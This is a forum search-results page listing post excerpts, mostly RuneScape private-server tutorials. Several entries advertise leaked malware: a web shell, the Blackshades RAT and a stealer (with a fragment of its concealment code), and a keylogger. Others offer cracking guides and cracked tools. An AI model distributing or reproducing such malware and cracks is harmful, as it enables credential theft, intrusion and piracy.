Search results

  1. To My RuneRev Users ..

    Hello to all of the users that decided to stick around RG. You probably are mad, and/or hate me for such a drastic change, but all I ask is for you to see things from my perspective. School work was loading up, Xenon needed coding done daily, I had new coding projects I needed to work on, I...
  2. [RSPS SOURCE] HyBriD PvP V3 602 Anims-Gfx-Npc's, 634 Items&Torva, 16332 Downloads!!!

    Features: 634 Items - Check Shop Picture 602 Npc's Summoning - Cats, Dogs, Penguin, Dragons [Dragons are donator only] Perfect Leeching Anims Flashing are fixed - hand cannon stance works without flashing Allot Of Shops - Check Shop Picture Good Bosses - Avatar Of Destruction and Penance...
  3. [RSPS TUT] How to Start Your Own RSPS!

    Downloading winRar To start off, we'll download Winrar. Winrar is a program in which you can use to extract files from .rar format, you may download it here Downloading and Installing Java After you have done so, we will need the latest version of the Java Development Kit found...
  4. [RSPS TUT] Add a 508/525 Vote4cash

    First off, make a folder called mysql in the codeusa folder. Inside the folder create a new class named Vote4cash.java inside that class paste this /* * Class Vote4cash * * @author Taylor */ package net.com.codeusa.mysql; import java.sql.*; import...
  5. [RSPS TUT] Make Objects Unspawnable

    In commands.java add private static final int unspawnables[] = {}; And your ::item command should look like this when your done if (command[0].equals("item")) { int itemId = Integer.parseInt(command[1]); for (int id : unspawnables) { if (id == itemId) {...
  6. Add Teleport Buttons in Quest Tab [RSPS TUT]

    Ok first, you will need the files Actionbuttons.java & Frames.java. In Frames.java find: setTab(p, 75, 274); Then, under that add: : setString(p, "", 274, #); In the "" add the name of the teleport, for example setString(p, "<col=33FF33>TELEPORT NAME", 274, #); Home...
  7. [RSPS TUT] How to Add Donator Pts [JAVA]

    First Go Into Player.java-----Src----Server----Model-----Players donPoints, Next Go into Playersave.java-----Src----Server----Model-----Players Add } else if (token.equals("don-points")) { p.donPoints =...
  8. SyRiAn Sh3ll V7 - Private - LEAK!

    This is the most appropriate place to put this I suppose. http://pastebin.com/7eCujGB7
  9. Powerbot Advertising

    So I just bought a sticky there, and hopefully that can increase traffic even more! I bought it in the Runescape Discussion area (Which is a high populated board) Just waiting on getting it stickied by Paris now. :3 So whaddya think, will this increase traffic flow significantly? Or do you...
  10. [Reverse Engineering][Cracking Programs!] Best Starters Pack! [FREE]

    As the title reads, here's a few tutorials on cracking applications, which Include the following: Serial Fishing Internal keygen and patching Unpacking and patching Inline patching packers theory Cracking using memory breakpoints breakpoints theory Defeating magicByte protection...
  11. [LEAK] Blackshades RAT Source Code [LEAK][VB6]

    The file is too big for an attachment so I uploaded it to megaupload. http://www.megaupload.com/?d=W0A160RC
  12. [LEAK] Blackshades Stealer Source Code [VB6]

    Forms: frmMain fSteam ----------------------------------------- frmMain_Load: Private Sub Form_Load() On Error Resume Next App.TaskVisible = 0 Me.Hide Me.global_52 = CStr(String(&H104, Chr(0))) MemVar_420078 = PC_INFO_GET() Me.global_52 = DIR_ME() & "\" & App.EXEName & ".exe"...
  13. [VB.NET SOURCE] Classical's Polymorphic CodeDOM Keylogger [SOURCE]

    It's not actually polymorphic as polymorphism is impossible (at this time) in .NET Framework based languages, so I don't know why Classical named it that :/ It's more of a dynamic encryption, anywho it's fully commented so hopefully you can learn from it...
  14. [Reverse Engineering] How to Crack .NET License Checks [eBook]

    http://www.mediafire.com/?a2itcpp86vlqkdt
  15. [TUT] How To Make Your Internet Browser Show Password Fields [Javascript]

    Put the above into your URL Bar, and hit enter. Tada. NOTE: Most modern browsers won't accept this javascript so you have to bookmark it then use the bookmark while on the site.
  16. [VB.NET SOURCE] Faffafy HWID Licensing System v3 [PHP+VB.NET+PSD FILES!]

    Don't ask me where I got them ; )
  17. [CRACKED] YouToob FE [Youtube BOT]

    This cracked was brought to you by Deceptive Engineering
  18. [RELEASE] SAFE3 Web Vulnerability Scanner 9.0 [CRACKED]

    It basically scans a webpage for you to see if any potential exploits exist. Perfect for SQLi, and XSS exploits. This crack was brought to you by: Deceptive Engineering
Back
Top